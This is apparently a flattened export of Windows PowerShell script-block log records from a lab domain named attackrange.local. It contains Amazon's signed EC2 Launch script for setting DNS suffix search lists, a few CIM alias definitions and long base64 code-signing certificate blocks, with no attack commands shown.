cq9ok3DCsrp1mWpzMpTREEQQLt+C8weE5nQ7bXHiLQwb7iDVySAdYyktzuxeTsiT # +CFhmzTrBcZe7FsavOvJz82sNEBfsXpm7nfISKhmV1efVFiODCu3T6cw2Vbuyntd # 463JT17lNecxy9qTXtyOj4DatpGYQJB5w3jHtrHEtWoYOAMQjdjUN6QuBX2I9YI+ # EJFwq1WCQTLX2wRzKm6RAXwhTNS8rhsDdV14Ztk6MUSaM0C/CNdaSaTC5qmgZ92k # J7yhTzm1EVgX9yRcRo9k98FpiHaYdj1ZXUJ2h4mXaXpI8OCiEhtmmnTK3kse5w5j # rubU75KSOp493ADkRSWJtppEGSt+wJS00mFt6zPZxd9LBADMfRyVw4/3IbKyEbe7 # f/LVjHAsQWCqsWMYRJUadmJ+9oCw++hkpjPRiQfhvbfmQ6QYuKZ3AeEPlAwhHbJU # KSWJbOUOUlFHdL4mrLZBdd56rF+NP8m800ERElvlEFDrMcXKchYiCd98THU/Y+wh # X8QgUWtvsauGi0/C1kVfnSD8oR7FwI+isX4KJpn15GkvmB0t9dmpsh3lGwIDAQAB # o4IBZjCCAWIwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQU7NfjgtJxXWRM3y5n # P+e6mK4cD08wHwYDVR0jBBgwFoAUsT7DaQP4v0cB1JgmGggC72NkK8MwDgYDVR0P # AQH/BAQDAgGGMBMGA1UdJQQMMAoGCCsGAQUFBwMDMH8GCCsGAQUFBwEBBHMwcTAk # BggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEkGCCsGAQUFBzAC # hj1odHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRIaWdoQXNzdXJh # bmNlRVZSb290Q0EuY3J0MEsGA1UdHwREMEIwQKA+oDyGOmh0dHA6Ly9jcmwzLmRp # Z2ljZXJ0LmNvbS9EaWdpQ2VydEhpZ2hBc3N1cmFuY2VFVlJvb3RDQS5jcmwwHAYD # VR0gBBUwEzAHBgVngQwBAzAIBgZngQwBBAEwDQYJKoZIhvcNAQELBQADggEBAEHx # qRH0DxNHecllao3A7pgEpMbjDPKisedfYk/ak1k2zfIe4R7sD+EbP5HU5A/C5pg0 # /xkPZigfT2IxpCrhKhO61z7H0ZL+q93fqpgzRh9Onr3g7QdG64AupP2uU7SkwaT1 # IY1rzAGt9Rnu15ClMlIr28xzDxj4+87eg3Gn77tRWwR2L62t0+od/P1Tk+WMieNg # GbngLyOOLFxJy34riDkruQZhiPOuAnZ2dMFkkbiJUZflhX0901emWG4f7vtpYeJa # 3Cgh6GO6Ps9W7Zrk9wXqyvPsEt84zdp7PiuTUy9cUQBY3pBIowrHC/Q7bVUx8ALM # R3eWUaNetbxcyEMRoacwggawMIIEmKADAgECAhAIrUCyYNKcTJ9ezam9k67ZMA0G # CSqGSIb3DQEBDAUAMGIxCzAJBgNVBAYTAlVTMRUwEwYDVQQKEwxEaWdpQ2VydCBJ # bmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xITAfBgNVBAMTGERpZ2lDZXJ0 # IFRydXN0ZWQgUm9vdCBHNDAeFw0yMTA0MjkwMDAwMDBaFw0zNjA0MjgyMzU5NTla # MGkxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwgSW5jLjFBMD8GA1UE # AxM4RGlnaUNlcnQgVHJ1c3RlZCBHNCBDb2RlIFNpZ25pbmcgUlNBNDA5NiBTSEEz # ODQgMjAyMSBDQTEwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDVtC9C # 0CiteLdd1TlZG7GIQvUzjOs9gZdwxbvEhSYwn6SOaNhc9es0JAfhS0/TeEP0F9ce # 2vnS1WcaUk8OoVf8iJnBkcyBAz5NcCRks43iCH00fUyAVxJrQ5qZ8sU7H/Lvy0da # E6ZMswEgJfMQ04uy+wjwiuCdCcBlp/qYgEk1hz1RGeiQIXhFLqGfLOEYwhrMxe6T # SXBCMo/7xuoc82VokaJNTIIRSFJo3hC9FFdd6BgTZcV/sk+FLEikVoQ11vkunKoA # FdE3/hoGlMJ8yOobMubKwvSnowMOdKWvObarYBLj6Na59zHh3K3kGKDYwSNHR7Oh # D26jq22YBoMbt2pnLdK9RBqSEIGPsDsJ18ebMlrC/2pgVItJwZPt4bRc4G/rJvmM # 1bL5OBDm6s6R9b7T+2+TYTRcvJNFKIM2KmYoX7BzzosmJQayg9Rc9hUZTO1i4F4z # 8ujo7AqnsAMrkbI2eb73rQgedaZlzLvjSFDzd5Ea/ttQokbIYViY9XwCFjyDKK05 # huzUtw1T0PhH5nUwjewwk3YUpltLXXRhTT8SkXbev1jLchApQfDVxW0mdmgRQRNY # mtwmKwH0iU1Z23jPgUo+QEdfyYFQc4UQIyFZYIpkVMHMIRroOBl8ZhzNeDhFMJlP # /2NPTLuqDQhTQXxYPUez+rbsjDIJAsxsPAxWEQIDAQABo4IBWTCCAVUwEgYDVR0T # AQH/BAgwBgEB/wIBADAdBgNVHQ4EFgQUaDfg67Y7+F8Rhvv+YXsIiGX0TkIwHwYD # VR0jBBgwFoAU7NfjgtJxXWRM3y5nP+e6mK4cD08wDgYDVR0PAQH/BAQDAgGGMBMG # A1UdJQQMMAoGCCsGAQUFBwMDMHcGCCsGAQUFBwEBBGswaTAkBggrBgEFBQcwAYYY # aHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEEGCCsGAQUFBzAChjVodHRwOi8vY2Fj # ZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRUcnVzdGVkUm9vdEc0LmNydDBDBgNV # HR8EPDA6MDigNqA0hjJodHRwOi8vY3JsMy5kaWdpY2VydC5jb20vRGlnaUNlcnRU # cnVzdGVkUm9vdEc0LmNybDAcBgNVHSAEFTATMAcGBWeBDAEDMAgGBmeBDAEEATAN # BgkqhkiG9w0BAQwFAAOCAgEAOiNEPY0Idu6PvDqZ01bgAhql+Eg08yy25nRm95Ry # sQDKr2wwJxMSnpBEn0v9nqN8JtU3vDpdSG2V1T9J9Ce7FoFFUP2cvbaF4HZ+N3HL # IvdaqpDP9ZNq4+sg0dVQeYiaiorBtr2hSBh+3NiAGhEZGM1hmYFW9snjdufE5Btf # Q/g+lP92OT2e1JnPSt0o618moZVYSNUa/tcnP/2Q0XaG3RywYFzzDaju4ImhvTnh # OE7abrs2nfvlIVNaw8rpavGiPttDuDPITzgUkpn13c5UbdldAhQfQDN8A+KVssIh # dXNSy0bYxDQcoqVLjc1vdjcshT8azibpGL6QB7BDf5WIIIJw8MzK7/0pNVwfiThV # 9zeKiwmhywvpMRr/LhlcOXHhvpynCgbWJme3kuZOX956rEnPLqR0kq3bPKSchh/j # wVYbKyP/j7XqiHtwa+aguv06P0WmxOgWkVKLQcBIhEuWTatEQOON8BUozu3xGFYH # Ki8QxAwIZDwzj64ojDzLj4gLDb879M4ee47vtevLt/B3E+bnKD+sEq6lLyJsQfmC # XBVmzGwOysWGw/YmMwwHS6DTBwJqakAwSEs0qFEgu60bhQjiWQ1tygVQK+pKHJ6l # /aCnHwZ05/LWUpD9r4VIIflXO7ScA+2GRfS0YW6/aOImYIbqyK+p/pQd52MbOoZW # eE4wggedMIIFhaADAgECAhACxyVvD/v+ctpMbqqoNdVVMA0GCSqGSIb3DQEBCwUA # MGkxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwgSW5jLjFBMD8GA1UE # AxM4RGlnaUNlcnQgVHJ1c3RlZCBHNCBDb2RlIFNpZ25pbmcgUlNBNDA5NiBTSEEz # ODQgMjAyMSBDQTEwHhcNMjIxMTA1MDAwMDAwWhcNMjMxMTA4MjM1OTU5WjCB8jET # MBEGCysGAQQBgjc8AgEDEwJVUzEZMBcGCysGAQQBgjc8AgECEwhEZWxhd2FyZTEd # MBsGA1UEDwwUUHJpdmF0ZSBPcmdhbml6YXRpb24xEDAOBgNVBAUTBzQxNTI5NTQx # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdTZWF0 # dGxlMSIwIAYDVQQKExlBbWF6b24gV2ViIFNlcnZpY2VzLCBJbmMuMRMwEQYDVQQL # EwpBbWF6b24gRUMyMSIwIAYDVQQDExlBbWF6b24gV2ViIFNlcnZpY2VzLCBJbmMu # MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEA0jWbhD4ghdeO4Nndy/2h # vCCUPPKnL63myeBZYItXG1dnB5gpJIrBVu40V4OaiNwyUAiBrO5eGM4IaWLqbxvj # 324KRuXtmHcXvF7YRgiciflrsfzoUEu4TdKj+owTNA2uektzbVLWzT0wFKe5n4Xe # CAqQQe33ODVB+cBTUSv/TRWf3Edni17S8HldwSq+YvPIRv21Shp7fiCxO45ETxwl # BsoeNrwLAQz0QpiaGdY5Fb+12jcoWRqYqAiXGeDLA7Wxq1+Xj2n+UwelzhYfcE5/ # p8w4FsFJi9tVb0aWS63OnP+aTOCrA5bz5j9wq8x25/hCGm6HktmbZRwjKiFQ+HdL # g0t3250T9hxvXjudh/DGPCIcmQzKBuxijP8f60DutqLk/EsS+Z5xD/s9/rruXfAj # czkZ/xpHLHKa+Fp7x+tIwuC5Zq6VAM6CFgJOWefYG5h8sjZFhrphbnYzs0C75SCx # KOKFe6RyrQ+O+xh96ky4kw47zNXbbc7xBqVjLjbOgSTFAgMBAAGjggI1MIICMTAf # BgNVHSMEGDAWgBRoN+Drtjv4XxGG+/5hewiIZfROQjAdBgNVHQ4EFgQUOv3VJlso # 3pHAv43pOWMQfdVdjXkwLgYDVR0RBCcwJaAjBggrBgEFBQcIA6AXMBUME1VTLURF # TEFXQVJFLTQxNTI5NTQwDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUF # BwMDMIG1BgNVHR8Ega0wgaowU6BRoE+GTWh0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNv # bS9EaWdpQ2VydFRydXN0ZWRHNENvZGVTaWduaW5nUlNBNDA5NlNIQTM4NDIwMjFD # QTEuY3JsMFOgUaBPhk1odHRwOi8vY3JsNC5kaWdpY2VydC5jb20vRGlnaUNlcnRU # cnVzdGVkRzRDb2RlU2lnbmluZ1JTQTQwOTZTSEEzODQyMDIxQ0ExLmNybDA9BgNV # HSAENjA0MDIGBWeBDAEDMCkwJwYIKwYBBQUHAgEWG2h0dHA6Ly93d3cuZGlnaWNl # cnQuY29tL0NQUzCBlAYIKwYBBQUHAQEEgYcwgYQwJAYIKwYBBQUHMAGGGGh0dHA6 # Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBcBggrBgEFBQcwAoZQaHR0cDovL2NhY2VydHMu # ZGlnaWNlcnQuY29tL0RpZ2lDZXJ0VHJ1c3RlZEc0Q29kZVNpZ25pbmdSU0E0MDk2 # U0hBMzg0MjAyMUNBMS5jcnQwDAYDVR0TAQH/BAIwADANBgkqhkiG9w0BAQsFAAOC # AgEARxdSHXYd6BO2G0SQESFEKuC2xGsuekZq4Q//Jg3mHKBkDSLrK1PEriBExb5n # JNAmCoh374kLOj9fbV5kPmj2kTdH65b1GVIp4VADVOwla1NGrbqFIvSzUN68xqWw # ITM15yR5OU4peuSD8pdxGLwIM3YEsorhVugVI/TZ3oSs89vMNKIUK4qrHvDpveUf # 1tQKFYUwyKEkauDqovs2pS7G6+1mqSgXx4Nt1OdZwwdXS8d14xcsaz96C+4G7fAr # lbcKiGnHwxlO0FaC+piuverA1NU3lw8UFlTdaQxldKhS47iKZaWTS+mwi2H5PC2G # cgXNlQG5tuh/TimhfHpqrvtrXBpNQTU6ydv6E/Bj6DE5VkJGIKua0GvI7LkwFBFC # WD1hrAEjtY2LkPAgMDQe9iqPoEGeNwZeEjJjLgayPLP7NsJRdA6uhXboMEFW2LNf # VM/hdzl1RG/5kJ4La/mEkpvQRtZRbaSPuSHRxGz//P62qKFQGL0K/YI9RlowyGrQ # ENfvztdmqPN8xLJ7C7IuWkx2ygO++4Vva/DaiXX2gMtt6hYYfngOt6+beRWLbpdr # cNgUrUJAGg8saVOkrBdziuB0fS93jso0mBvz0DTFXE5vvE8yOYQWR0njIOKbZuB5 # A15FSIngJ+joE7MFjkxwkQwx5czjrG0GVfqSSK8WiL5yq2wxghnnMIIZ4wIBATB9 # MGkxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwgSW5jLjFBMD8GA1UE # AxM4RGlnaUNlcnQgVHJ1c3RlZCBHNCBDb2RlIFNpZ25pbmcgUlNBNDA5NiBTSEEz # ODQgMjAyMSBDQTECEALHJW8P+/5y2kxuqqg11VUwDQYJYIZIAWUDBAIBBQCgfDAQ # BgorBgEEAYI3AgEMMQIwADAZBgkqhkiG9w0BCQMxDAYKKwYBBAGCNwIBBDAcBgor # BgEEAYI3AgELMQ4wDAYKKwYBBAGCNwIBFTAvBgkqhkiG9w0BCQQxIgQgW5Ej8brX # 5YlTBkoyY2drpoCT/V57IcT8S8Iq8hJJVtswDQYJKoZIhvcNAQEBBQAEggGAt5Ty # 7obsD/Z0ezG66VhUH0wII01W42R03uEEvqZg2YFV6D+kt5pnjZ4xSz+Vu0EP3eth # tUZcpF/uZOeLC1OVhCW+/VaqTjLZChaMBxzvEIB+RoUcOnxUJL5d3Qd9TAbLpm6i # nrm2KC4cgnNkRUsal37xBaTXPqoayv2ZGpkUtay8UkZzYinn3pKyjdWudevHInbO # hRY0LFWi9O3PRE3/iyTCCFP63zkcZrIKCC3Qy4U0oFbXQOZ3DsnJtMuC/1j0tUb5 # veZmgGjgG1/UGR/55o/cI+NiFMpkodqgyV/td4qrOkLg4SVk8ULKkDNxlhLIjOxg # WWYEyrEBr1L5BHO6MxmD9DLl2ysotevtX8WVt5wsgfY2pbGYx8nqFKBVPBhW26p/ # 33axLhgR8rNhhRRkU/W3uT1bW3x0sfssTaF6R3riQhrex27IJFPTLwOeJEQ5UhhE # IMdmXSQYEPHEQ4RqUTISJsMJ8KZrwktxpETj0cH3mSkmhFIiMpVwaQ633m5qoYIX # PTCCFzkGCisGAQQBgjcDAwExghcpMIIXJQYJKoZIhvcNAQcCoIIXFjCCFxICAQMx # DzANBglghkgBZQMEAgEFADB3BgsqhkiG9w0BCRABBKBoBGYwZAIBAQYJYIZIAYb9 # bAcBMDEwDQYJYIZIAWUDBAIBBQAEIHZBTdEg6m7H1JWYSgkwZqZJca9sn4GAr8Tv # //NRYrMmAhBBWvl/ekQTLH0fNK1QEpn/GA8yMDIyMTIyNDA5MjMyNlqgghMHMIIG # wDCCBKigAwIBAgIQDE1pckuU+jwqSj0pB4A9WjANBgkqhkiG9w0BAQsFADBjMQsw # CQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xOzA5BgNVBAMTMkRp # Z2lDZXJ0IFRydXN0ZWQgRzQgUlNBNDA5NiBTSEEyNTYgVGltZVN0YW1waW5nIENB # MB4XDTIyMDkyMTAwMDAwMFoXDTMzMTEyMTIzNTk1OVowRjELMAkGA1UEBhMCVVMx # ETAPBgNVBAoTCERpZ2lDZXJ0MSQwIgYDVQQDExtEaWdpQ2VydCBUaW1lc3RhbXAg # MjAyMiAtIDIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDP7KUmOsap # 8mu7jcENmtuh6BSFdDMaJqzQHFUeHjZtvJJVDGH0nQl3PRWWCC9rZKT9BoMW15GS # OBwxApb7crGXOlWvM+xhiua46c52f8-500d-4346-a94c-955ffcd584f8C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Scripts\Add-DnsSuffixList.ps1 4104152150x0717134Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name ncso -Value New-CimSessionOption -Option ReadOnly, AllScope -ErrorAction SilentlyContinue16fc0cc5-8058-472a-9faf-3f50af5b11c2 4104152150x0717128Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name ncms -Value New-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinue91505045-6510-47f8-a85c-e6ef29ca494a 4104152150x0717122Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name icim -Value Invoke-CimMethod -Option ReadOnly, AllScope -ErrorAction SilentlyContinue0eb3b12d-ca8c-4ee5-9aac-042f1a982b2c 4104152150x0225557Microsoft-Windows-PowerShell/Operationalmswin-exch01.attackrange.local11Set-Alias -Name ncso -Value New-CimSessionOption -Option ReadOnly, AllScope -ErrorAction SilentlyContinuebd0bb311-699b-4650-a609-b15006701410 4104152150x0225551Microsoft-Windows-PowerShell/Operationalmswin-exch01.attackrange.local11Set-Alias -Name ncms -Value New-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinue932be937-ce5b-4c9e-9e90-8f8ce101f0db 4104152150x0225545Microsoft-Windows-PowerShell/Operationalmswin-exch01.attackrange.local11Set-Alias -Name icim -Value Invoke-CimMethod -Option ReadOnly, AllScope -ErrorAction SilentlyContinued98ef55d-1ee6-41a0-a949-8cca6aebd52e 4104152150x0225288Microsoft-Windows-PowerShell/Operationalmswin-exch01.attackrange.local12# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Amazon Software License (the "License"). # You may not use this file except in compliance with the License. # A copy of the License is located at # # http://aws.amazon.com/asl/ # # or in the "license" file accompanying this file. This file is distributed # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. <#----------------------------------------------------------------------------------------------------------- Add-DnsSuffixList adds DNS suffixes. -------------------------------------------------------------------------------------------------------------#> function Add-DnsSuffixList { $state = Get-LaunchConfig -Key AddDnsSuffixList [System.GC]::Collect() if (-not $state) { Write-Log "Adding DNS suffix list is disabled" return } $suffixList = @() Write-Log ("Adding DNS suffixes in search list begins") # Try to create a suffix with available zone try { # Availability-zone includes period at the end, so it needs to remove it. $availabilityZone = (Get-Metadata -UrlFragment "meta-data/placement/availability-zone").Trim() if ($availabilityZone.EndsWith(".")) { $availabilityZone = $availabilityZone.Substring(0,$availabilityZone.Length - 1) } $suffixList += "{0}.ec2-utilities.amazonaws.com" -f $availabilityZone.Substring(0,$availabilityZone.Length - 1) } catch { Write-ErrorLog ("Failed to get availability zone: {0}" -f $_.Exception.Message) } # Try to get global search list try { $tcpRegPath = "HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" $tcpRegRes = Get-ItemProperty -Path $tcpRegPath $existingList = $tcpRegRes.SearchList -split "," foreach ($existing in $existingList) { if ($existing -and $suffixList -notcontains $existing) { $suffixList += $existing.ToLower() } } } catch { Write-ErrorLog ("Failed to get global search list: {0}" -f $_.Exception.Message) } # Try to get DNS Domain try { $dnsDomain = $tcpRegRes.Domain if ($dnsDomain -and $suffixList -notcontains $dnsDomain) { $suffixList += $dnsDomain.ToLower() } $isUsingDomainDevolution = $tcpRegRes.UseDomainNameDevolution if ($isUsingDomainDevolution -ne 0) { $dnsDomains = $dnsDomain -split "\." if ($dnsDomains.Length -gt 2) { $dns = $dnsDomains.Get($dnsDomains.Length - 1) for ($i = $dnsDomains.Length - 2; $i -ge 1; $i --) { $dns = "{0}.{1}" -f $dnsDomains.Get($i),$dns if ($dns -and $suffixList -notcontains $dns) { $suffixList += $dns.ToLower() } } } } } catch { Write-ErrorLog ("Failed to get DNS domain from registry: {0}" -f $_.Exception.Message) } # Try to get NV Domain - contains computer's primary DNS suffix try { $nvDomain = $tcpRegRes. "NV Domain" if ($nvDomain -and $suffixList -notcontains $nvDomain) { $suffixList += $nvDomain.ToLower() } } catch { Write-ErrorLog ("Failed to get NV domain: {0}" -f $_.Exception.Message) } # Try to get DNS Domain from connected NICs try { $networkAdapters = Get-CimInstance -ClassName Win32_NetworkAdapter foreach ($networkAdapter in $networkAdapters) { # Check each NIC if it is connected (Connected = 2) if ($networkAdapter.NetConnectionStatus -eq 2) { $networkConfig = Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter "Index='$($networkAdapter.Index)'" $nicDnsDomain = $networkConfig.DNSDomain if ($nicDnsDomain -and $suffixList -notcontains $nicDnsDomain) { $suffixList += $nicDnsDomain.ToLower() } } } } catch { Write-ErrorLog ("Failed to get DNS domain from NICs: {0}" -f $_.Exception.Message) } try { # Set DNS suffix search list Invoke-CimMethod -ClassName Win32_NetworkAdapterConfiguration -MethodName "SetDNSSuffixSearchOrder" -Arguments @{ DNSDomainSuffixSearchOrder = $suffixList } | Out-Null } catch { Write-ErrorLog ("Failed to set DNS suffix search list: {0}" -f $_.Exception.Message) } Write-Log ("Adding DNS suffixes in search list done") } # SIG # Begin signature block # MIIuqgYJKoZIhvcNAQcCoIIumzCCLpcCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAwdXMjmgee8GrG # wK7q1ggMNwj1l3PZixsOVf6I/u33B6CCFBkwggXAMIIEqKADAgECAhAP0bvKeWvX # +N1MguEKmpYxMA0GCSqGSIb3DQEBCwUAMGwxCzAJBgNVBAYTAlVTMRUwEwYDVQQK # EwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xKzApBgNV # BAMTIkRpZ2lDZXJ0IEhpZ2ggQXNzdXJhbmNlIEVWIFJvb3QgQ0EwHhcNMjIwMTEz # MDAwMDAwWhcNMzExMTA5MjM1OTU5WjBiMQswCQYDVQQGEwJVUzEVMBMGA1UEChMM # RGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQuY29tMSEwHwYDVQQD # ExhEaWdpQ2VydCBUcnVzdGVkIFJvb3QgRzQwggIiMA0GCSqGSIb3DQEBAQUAA4IC # DwAwggIKAoICAQC/5pBzaN675F1KPDAiMGkz7MKnJS7JIT3yithZwuEppz1Yq3aa # za57G4QNxDAf8xukOBbrVsaXbR2rsnnyyhHS5F/WBTxSD1Ifxp4VpX6+n6lXFllV # cq9ok3DCsrp1mWpzMpTREEQQLt+C8weE5nQ7bXHiLQwb7iDVySAdYyktzuxeTsiT # +CFhmzTrBcZe7FsavOvJz82sNEBfsXpm7nfISKhmV1efVFiODCu3T6cw2Vbuyntd # 463JT17lNecxy9qTXtyOj4DatpGYQJB5w3jHtrHEtWoYOAMQjdjUN6QuBX2I9YI+ # EJFwq1WCQTLX2wRzKm6RAXwhTNS8rhsDdV14Ztk6MUSaM0C/CNdaSaTC5qmgZ92k # J7yhTzm1EVgX9yRcRo9k98FpiHaYdj1ZXUJ2h4mXaXpI8OCiEhtmmnTK3kse5w5j # rubU75KSOp493ADkRSWJtppEGSt+wJS00mFt6zPZxd9LBADMfRyVw4/3IbKyEbe7 # f/LVjHAsQWCqsWMYRJUadmJ+9oCw++hkpjPRiQfhvbfmQ6QYuKZ3AeEPlAwhHbJU # KSWJbOUOUlFHdL4mrLZBdd56rF+NP8m800ERElvlEFDrMcXKchYiCd98THU/Y+wh # X8QgUWtvsauGi0/C1kVfnSD8oR7FwI+isX4KJpn15GkvmB0t9dmpsh3lGwIDAQAB # o4IBZjCCAWIwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQU7NfjgtJxXWRM3y5n # P+e6mK4cD08wHwYDVR0jBBgwFoAUsT7DaQP4v0cB1JgmGggC72NkK8MwDgYDVR0P # AQH/BAQDAgGGMBMGA1UdJQQMMAoGCCsGAQUFBwMDMH8GCCsGAQUFBwEBBHMwcTAk # BggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEkGCCsGAQUFBzAC # hj1odHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRIaWdoQXNzdXJh # bmNlRVZSb290Q0EuY3J0MEsGA1UdHwREMEIwQKA+oDyGOmh0dHA6Ly9jcmwzLmRp # Z2ljZXJ0LmNvbS9EaWdpQ2VydEhpZ2hBc3N1cmFuY2VFVlJvb3RDQS5jcmwwHAYD # VR0gBBUwEzAHBgVngQwBAzAIBgZngQwBBAEwDQYJKoZIhvcNAQELBQADggEBAEHx # qRH0DxNHecllao3A7pgEpMbjDPKisedfYk/ak1k2zfIe4R7sD+EbP5HU5A/C5pg0 # /xkPZigfT2IxpCrhKhO61z7H0ZL+q93fqpgzRh9Onr3g7QdG64AupP2uU7SkwaT1 # IY1rzAGt9Rnu15ClMlIr28xzDxj4+87eg3Gn77tRWwR2L62t0+od/P1Tk+WMieNg # GbngLyOOLFxJy34riDkruQZhiPOuAnZ2dMFkkbiJUZflhX0901emWG4f7vtpYeJa # 3Cgh6GO6Ps9W7Zrk9wXqyvPsEt84zdp7PiuTUy9cUQBY3pBIowrHC/Q7bVUx8ALM # R3eWUaNetbxcyEMRoacwggawMIIEmKADAgECAhAIrUCyYNKcTJ9ezam9k67ZMA0G # CSqGSIb3DQEBDAUAMGIxCzAJBgNVBAYTAlVTMRUwEwYDVQQKEwxEaWdpQ2VydCBJ # bmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xITAfBgNVBAMTGERpZ2lDZXJ0 # IFRydXN0ZWQgUm9vdCBHNDAeFw0yMTA0MjkwMDAwMDBaFw0zNjA0MjgyMzU5NTla # MGkxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwgSW5jLjFBMD8GA1UE # AxM4RGlnaUNlcnQgVHJ1c3RlZCBHNCBDb2RlIFNpZ25pbmcgUlNBNDA5NiBTSEEz # ODQgMjAyMSBDQTEwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDVtC9C # 0CiteLdd1TlZG7GIQvUzjOs9gZdwxbvEhSYwn6SOaNhc9es0JAfhS0/TeEP0F9ce # 2vnS1WcaUk8OoVf8iJnBkcyBAz5NcCRks43iCH00fUyAVxJrQ5qZ8sU7H/Lvy0da # E6ZMswEgJfMQ04uy+wjwiuCdCcBlp/qYgEk1hz1RGeiQIXhFLqGfLOEYwhrMxe6T # SXBCMo/7xuoc82VokaJNTIIRSFJo3hC9FFdd6BgTZcV/sk+FLEikVoQ11vkunKoA # FdE3/hoGlMJ8yOobMubKwvSnowMOdKWvObarYBLj6Na59zHh3K3kGKDYwSNHR7Oh # D26jq22YBoMbt2pnLdK9RBqSEIGPsDsJ18ebMlrC/2pgVItJwZPt4bRc4G/rJvmM # 1bL5OBDm6s6R9b7T+2+TYTRcvJNFKIM2KmYoX7BzzosmJQayg9Rc9hUZTO1i4F4z # 8ujo7AqnsAMrkbI2eb73rQgedaZlzLvjSFDzd5Ea/ttQokbIYViY9XwCFjyDKK05 # huzUtw1T0PhH5nUwjewwk3YUpltLXXRhTT8SkXbev1jLchApQfDVxW0mdmgRQRNY # mtwmKwH0iU1Z23jPgUo+QEdfyYFQc4UQIyFZYIpkVMHMIRroOBl8ZhzNeDhFMJlP # /2NPTLuqDQhTQXxYPUez+rbsjDIJAsxsPAxWEQIDAQABo4IBWTCCAVUwEgYDVR0T # AQH/BAgwBgEB/wIBADAdBgNVHQ4EFgQUaDfg67Y7+F8Rhvv+YXsIiGX0TkIwHwYD # VR0jBBgwFoAU7NfjgtJxXWRM3y5nP+e6mK4cD08wDgYDVR0PAQH/BAQDAgGGMBMG # A1UdJQQMMAoGCCsGAQUFBwMDMHcGCCsGAQUFBwEBBGswaTAkBggrBgEFBQcwAYYY # aHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEEGCCsGAQUFBzAChjVodHRwOi8vY2Fj # ZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRUcnVzdGVkUm9vdEc0LmNydDBDBgNV # HR8EPDA6MDigNqA0hjJodHRwOi8vY3JsMy5kaWdpY2VydC5jb20vRGlnaUNlcnRU # cnVzdGVkUm9vdEc0LmNybDAcBgNVHSAEFTATMAcGBWeBDAEDMAgGBmeBDAEEATAN # BgkqhkiG9w0BAQwFAAOCAgEAOiNEPY0Idu6PvDqZ01bgAhql+Eg08yy25nRm95Ry # sQDKr2wwJxMSnpBEn0v9nqN8JtU3vDpdSG2V1T9J9Ce7FoFFUP2cvbaF4HZ+N3HL # IvdaqpDP9ZNq4+sg0dVQeYiaiorBtr2hSBh+3NiAGhEZGM1hmYFW9snjdufE5Btf # Q/g+lP92OT2e1JnPSt0o618moZVYSNUa/tcnP/2Q0XaG3RywYFzzDaju4ImhvTnh # OE7abrs2nfvlIVNaw8rpavGiPttDuDPITzgUkpn13c5UbdldAhQfQDN8A+KVssIh # dXNSy0bYxDQcoqVLjc1vdjcshT8azibpGL6QB7BDf5WIIIJw8MzK7/0pNVwfiThV # 9zeKiwmhywvpMRr/LhlcOXHhvpynCgbWJme3kuZOX956rEnPLqR0kq3bPKSchh/j # wVYbKyP/j7XqiHtwa+aguv06P0WmxOgWkVKLQcBIhEuWTatEQOON8BUozu3xGFYH # Ki8QxAwIZDwzj64ojDzLj4gLDb879M4ee47vtevLt/B3E+bnKD+sEq6lLyJsQfmC # XBVmzGwOysWGw/YmMwwHS6DTBwJqakAwSEs0qFEgu60bhQjiWQ1tygVQK+pKHJ6l # /aCnHwZ05/LWUpD9r4VIIflXO7ScA+2GRfS0YW6/aOImYIbqyK+p/pQd52MbOoZW # eE4wggedMIIFhaADAgECAhACxyVvD/v+ctpMbqqoNdVVMA0GCSqGSIb3DQEBCwUA # MGkxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwgSW5jLjFBMD8GA1UE # 